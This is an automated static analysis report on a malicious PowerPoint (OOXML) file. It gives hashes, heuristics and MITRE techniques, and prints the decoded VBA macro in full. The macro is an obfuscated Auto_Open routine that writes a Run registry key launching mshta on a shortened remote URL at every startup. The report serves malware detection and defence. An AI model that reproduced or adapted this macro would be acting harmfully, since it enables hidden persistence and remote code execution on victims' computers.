Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 caf53e4143d03eb3…

MALICIOUS

Office (OOXML)

7.1 KB First seen: 2021-06-20
MD5: 96a60123974dca0f1a310e4fb9306995 SHA-1: 42bd7f26857ef26805664ad83da155cc5a877982 SHA-256: caf53e4143d03eb3e7d952710a9c8dfd43d8e715dac23c983f8673ab21ee8d53
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The VBA macro contains an Auto_Open subroutine that executes when the document is opened. This macro uses GetObject to interact with WMI and writes a registry value to 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater' with the value '"https://www.bitly.com/haiasdjaisdjswdhai"'. This action establishes persistence by ensuring the malicious URL is executed on system startup. The URL itself is benign according to reputation data, but its use in persistence is malicious.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/haiasdjaisdjswdhai In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 633 bytes
SHA-256: 9c644f080cb52360b863aa2ea8b31af68fd223f5618ef3ec76e6e7d259cc161a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()

r = StrReverse("s")
m = StrReverse("M")
p = StrReverse("H")
tu = StrReverse("T")
x = StrReverse("""")
ha = StrReverse("a")
culik = StrReverse("""")
calc = x + m + r + p + tu + ha + culik
Const polooood = &H80000001
mamammakdkd = "."
Set kaosdkqowkdok = GetObject("winmgmts:\\" & mamammakdkd & "\root\default:StdRegProv")
kdkaskllll = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
hotagotamota = "Updater"
pipatatutupu = calc + """https://www.bitly.com/haiasdjaisdjswdhai"""
kaosdkqowkdok.SetStringValue polooood, kdkaskllll, hotagotamota, pipatatutupu

End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/.bin 13312 bytes
SHA-256: 6753a78a96ecae9d1690b8ae5815f9d6050de2449d06beb6e3ef15d746826507

Open this report in the interactive analyzer, or submit your own file for analysis.